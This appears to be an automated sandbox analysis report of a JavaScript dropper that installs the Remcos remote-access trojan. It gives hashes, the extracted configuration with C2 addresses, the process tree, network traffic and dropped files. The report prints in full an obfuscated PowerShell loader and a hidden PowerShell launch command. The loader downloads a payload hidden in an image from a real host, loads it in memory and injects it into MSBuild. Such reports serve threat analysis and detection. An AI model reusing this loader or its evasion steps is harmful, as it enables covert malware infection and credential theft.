Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    15-12-2024 03:53

General

  • Target

    9b9059af739b167db6afce5129997e489dbb7baa3af27c8da5a68d564c2ed84e.js

  • Size

    4KB

  • MD5

    9c23d2a7acc6acc81022dee56521c2ba

  • SHA1

    40a93bafef8bfeec099f8f8f758336fe41a82a81

  • SHA256

    9b9059af739b167db6afce5129997e489dbb7baa3af27c8da5a68d564c2ed84e

  • SHA512

    193760ec2b498a40d2eb932314668aaf07c15d69b64ade12fe75e62d92a0a5ca34201f8f1c4a070b0e574e433fdf62fbe1785bbd2279f8e7fd58d2080df3aa88

  • SSDEEP

    48:zto05EfkLolvMHs8Zcj6qHs9aCgUvZ5LbmnpFP:ztFqfkL+vhj6qHsl5Z5LyrP

Malware Config

Extracted

Language
ps1
Source
if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };
URLs
ps1.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

exe.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

Extracted

Family

remcos

Botnet

RemoteHost

C2

160.25.73.25:6426

ruffella.duckdns.org:6426

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-QM0FWK

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\9b9059af739b167db6afce5129997e489dbb7baa3af27c8da5a68d564c2ed84e.js
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2992
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" C:\Windows\Temp\あ😒2⛑ぇ😯4♘オ😍4⛒く😾5.js
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:888
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = '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';$asphyxiation = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($forsakers));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $asphyxiation
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2676
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4808
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            5⤵
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2432
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\Admin\AppData\Local\Temp\kqelxapnqggqyolidygkpeurtbxorgmui"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1108
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\Admin\AppData\Local\Temp\mtkvy"
              6⤵
              • Accesses Microsoft Outlook accounts
              • System Location Discovery: System Language Discovery
              PID:3928
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\Admin\AppData\Local\Temp\wnpozllis"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5112

Network

  • flag-us
    DNS
    res.cloudinary.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    res.cloudinary.com
    IN A
    Response
    res.cloudinary.com
    IN CNAME
    resc.cloudinary.com.cdn.cloudflare.net
    resc.cloudinary.com.cdn.cloudflare.net
    IN A
    104.17.202.1
    resc.cloudinary.com.cdn.cloudflare.net
    IN A
    104.17.201.1
  • flag-us
    GET
    https://res.cloudinary.com/dzakc3wag/raw/upload/v1734112417/uploaded_textfile
    wscript.exe
    Remote address:
    104.17.202.1:443
    Request
    GET /dzakc3wag/raw/upload/v1734112417/uploaded_textfile HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: res.cloudinary.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sun, 15 Dec 2024 03:53:29 GMT
    Content-Type: application/octet-stream
    Content-Length: 157299
    Connection: keep-alive
    CF-Ray: 8f237ca83bc67723-LHR
    Accept-Ranges: bytes
    Access-Control-Allow-Origin: *
    Cache-Control: public, no-transform, immutable, max-age=2592000
    Content-Disposition: attachment; filename="uploaded_textfile"
    ETag: "e39538cf60c1a9768333bf00e0262702"
    Last-Modified: Fri, 13 Dec 2024 17:53:38 GMT
    Strict-Transport-Security: max-age=604800
    Vary: Accept-Encoding
    access-control-expose-headers: Content-Length,Content-Disposition,ETag,Server-Timing,Vary
    server-timing: cld-cloudflare;dur=22;start=2024-12-15T03:53:29.649Z;desc=hit,rtt;dur=48
    timing-allow-origin: *
    x-request-id: 09309909e85cdcf78096ba77219125ea
    Server: cloudflare
  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dns.google
  • flag-us
    DNS
    133.211.185.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.211.185.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    1.202.17.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.202.17.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    22.249.124.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.249.124.192.in-addr.arpa
    IN PTR
    Response
    22.249.124.192.in-addr.arpa
    IN PTR
    cloudproxy10022.sucuri.net
  • flag-us
    GET
    https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
    powershell.exe
    Remote address:
    104.17.202.1:443
    Request
    GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
    Host: res.cloudinary.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sun, 15 Dec 2024 03:53:30 GMT
    Content-Type: image/jpeg
    Content-Length: 2230233
    Connection: keep-alive
    CF-Ray: 8f237caf8b6194e4-LHR
    Accept-Ranges: bytes
    Access-Control-Allow-Origin: *
    Cache-Control: public, no-transform, immutable, max-age=2592000
    ETag: "7b9a6708dc7c92995f443d0b41dbc8d0"
    Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
    Strict-Transport-Security: max-age=604800
    Vary: Accept-Encoding
    access-control-expose-headers: Content-Length,ETag,Server-Timing,Vary,x-content-type-options
    server-timing: cld-cloudflare;dur=18;start=2024-12-15T03:53:30.814Z;desc=hit,rtt;dur=51,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17);"
    timing-allow-origin: *
    x-content-type-options: nosniff
    x-request-id: 6f487a4c60d72621f2efeecff85ca20a
    Server: cloudflare
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    paste.ee
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    paste.ee
    IN A
    Response
    paste.ee
    IN A
    104.21.84.67
    paste.ee
    IN A
    172.67.187.200
  • flag-us
    GET
    https://paste.ee/r/iDcBt/0
    powershell.exe
    Remote address:
    104.21.84.67:443
    Request
    GET /r/iDcBt/0 HTTP/1.1
    Host: paste.ee
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sun, 15 Dec 2024 03:53:39 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=2592000
    strict-transport-security: max-age=63072000
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1; mode=block
    content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
    CF-Cache-Status: HIT
    Age: 95197
    Last-Modified: Sat, 14 Dec 2024 01:27:02 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eyDw1lfxvGQqa7XOJ9xLShoZgADYc%2FWs9Jmp05m7wLnp009iaRQD0AecYvtpk9OP6LGN9shcsDG7NZEo%2FAfLBcQ1CXFGwmAlOVxd%2BY1VdI35Ys1o%2B0AOPB7q3A%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f237ce5aa479521-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=48695&min_rtt=47202&rtt_var=12530&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2977&recv_bytes=359&delivery_rate=76452&cwnd=253&unsent_bytes=0&cid=f144c36d67ed71dc&ts=126&x=0"
  • flag-us
    DNS
    67.84.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    67.84.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    25.73.25.160.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    25.73.25.160.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    geoplugin.net
    MSBuild.exe
    Remote address:
    8.8.8.8:53
    Request
    geoplugin.net
    IN A
    Response
    geoplugin.net
    IN A
    178.237.33.50
  • flag-nl
    GET
    http://geoplugin.net/json.gp
    MSBuild.exe
    Remote address:
    178.237.33.50:80
    Request
    GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    date: Sun, 15 Dec 2024 03:53:41 GMT
    server: Apache
    content-length: 956
    content-type: application/json; charset=utf-8
    cache-control: public, max-age=300
    access-control-allow-origin: *
  • flag-us
    DNS
    50.33.237.178.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    50.33.237.178.in-addr.arpa
    IN PTR
    Response
    50.33.237.178.in-addr.arpa
    IN CNAME
    50.32/27.178.237.178.in-addr.arpa
  • flag-us
    DNS
    56.163.245.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.163.245.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.42.69.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.42.69.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    77.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    77.190.18.2.in-addr.arpa
    IN PTR
    Response
    77.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-77.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    14.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.227.111.52.in-addr.arpa
    IN PTR
    Response
  • 104.17.202.1:443
    https://res.cloudinary.com/dzakc3wag/raw/upload/v1734112417/uploaded_textfile
    tls, http
    wscript.exe
    7.0kB
    171.2kB
    138
    134

    HTTP Request

    GET https://res.cloudinary.com/dzakc3wag/raw/upload/v1734112417/uploaded_textfile

    HTTP Response

    200
  • 104.17.202.1:443
    https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
    tls, http
    powershell.exe
    68.1kB
    2.3MB
    1183
    1664

    HTTP Request

    GET https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg

    HTTP Response

    200
  • 104.21.84.67:443
    https://paste.ee/r/iDcBt/0
    tls, http
    powershell.exe
    12.1kB
    685.4kB
    255
    502

    HTTP Request

    GET https://paste.ee/r/iDcBt/0

    HTTP Response

    200
  • 160.25.73.25:6426
    tls
    MSBuild.exe
    3.4kB
    1.7kB
    14
    17
  • 160.25.73.25:6426
    tls
    MSBuild.exe
    35.1kB
    513.0kB
    222
    401
  • 178.237.33.50:80
    http://geoplugin.net/json.gp
    http
    MSBuild.exe
    623 B
    1.3kB
    12
    3

    HTTP Request

    GET http://geoplugin.net/json.gp

    HTTP Response

    200
  • 8.8.8.8:53
    res.cloudinary.com
    dns
    powershell.exe
    64 B
    148 B
    1
    1

    DNS Request

    res.cloudinary.com

    DNS Response

    104.17.202.1
    104.17.201.1

  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    133.211.185.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    133.211.185.52.in-addr.arpa

  • 8.8.8.8:53
    1.202.17.104.in-addr.arpa
    dns
    71 B
    133 B
    1
    1

    DNS Request

    1.202.17.104.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    22.249.124.192.in-addr.arpa
    dns
    73 B
    113 B
    1
    1

    DNS Request

    22.249.124.192.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    paste.ee
    dns
    powershell.exe
    54 B
    86 B
    1
    1

    DNS Request

    paste.ee

    DNS Response

    104.21.84.67
    172.67.187.200

  • 8.8.8.8:53
    67.84.21.104.in-addr.arpa
    dns
    71 B
    133 B
    1
    1

    DNS Request

    67.84.21.104.in-addr.arpa

  • 8.8.8.8:53
    25.73.25.160.in-addr.arpa
    dns
    71 B
    125 B
    1
    1

    DNS Request

    25.73.25.160.in-addr.arpa

  • 8.8.8.8:53
    geoplugin.net
    dns
    MSBuild.exe
    59 B
    75 B
    1
    1

    DNS Request

    geoplugin.net

    DNS Response

    178.237.33.50

  • 8.8.8.8:53
    50.33.237.178.in-addr.arpa
    dns
    72 B
    155 B
    1
    1

    DNS Request

    50.33.237.178.in-addr.arpa

  • 8.8.8.8:53
    56.163.245.4.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    56.163.245.4.in-addr.arpa

  • 8.8.8.8:53
    241.42.69.40.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    241.42.69.40.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    77.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    77.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    14.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    14.227.111.52.in-addr.arpa

  • 8.8.8.8:53

MITRE ATT&CK Enterprise v15

Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    144B

    MD5

    510a364823ec4188609f8e311a1bdf7e

    SHA1

    10fcb9899987d677aa0b741dcbae83597c1ea3a9

    SHA256

    78db8e93bf7a68477bd6ba07c0b6f72cd16f23f42770ead0f31e4c26326abcd5

    SHA512

    9ff6c3331ccafc64871380b826f4c21ab865f7f8eafbad4109e2f99a04a872c2770a342174a730befb26324761ed0f067adfd2e9e8a9d6718e7027dc7dc8b102

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    f41839a3fe2888c8b3050197bc9a0a05

    SHA1

    0798941aaf7a53a11ea9ed589752890aee069729

    SHA256

    224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

    SHA512

    2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    d8b9a260789a22d72263ef3bb119108c

    SHA1

    376a9bd48726f422679f2cd65003442c0b6f6dd5

    SHA256

    d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

    SHA512

    550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mhqvgftk.qo0.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\kqelxapnqggqyolidygkpeurtbxorgmui

    Filesize

    4KB

    MD5

    bc25ccf39db8626dc249529bcc8c5639

    SHA1

    3e9cbdb20a0970a3c13719a2f289d210cdcc9e1d

    SHA256

    b333f8c736c701bc826886f395d928731850cbce6db77be752b3cf7979114904

    SHA512

    9a546127bddc1d187e674cda82e6c5046cac7f3e6f9515aed68d5bff2264b9d679d857dd97270e10826cd11ce2d92d82dd7f9801e19027e346b60bcc814cca1a

  • C:\Windows\Temp\あ😒2⛑ぇ😯4♘オ😍4⛒く😾5.js

    Filesize

    153KB

    MD5

    e39538cf60c1a9768333bf00e0262702

    SHA1

    ab80fc0c03325ea2647fc486b028cbc7ce705b3b

    SHA256

    dd3dd3f0da4553ef81c7fe5ae31f89454187e3b9cbc068a76ca7a9ae8cf2a873

    SHA512

    807a7a24ce847771a9cada7dd8d5a547a8946f2f86b61c8c612aaa675fbf55ad8ab96b381684ae0aece38e11535c46b2ae284973ec7324f28b6cd7eaacebd86f

  • memory/1108-47-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/1108-52-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/1108-50-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/2432-67-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-92-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-40-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-41-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-42-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-43-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-45-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-38-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-39-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-35-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-31-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-100-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-99-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-76-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-91-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-83-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-28-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-61-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/2432-64-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/2432-65-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/2432-66-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-84-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-68-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-75-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2676-8-0x000001E0707E0000-0x000001E070802000-memory.dmp

    Filesize

    136KB

  • memory/3928-48-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/3928-51-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/3928-53-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/4808-27-0x000001EDF8E60000-0x000001EDF8FB8000-memory.dmp

    Filesize

    1.3MB

  • memory/5112-49-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/5112-55-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/5112-54-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB
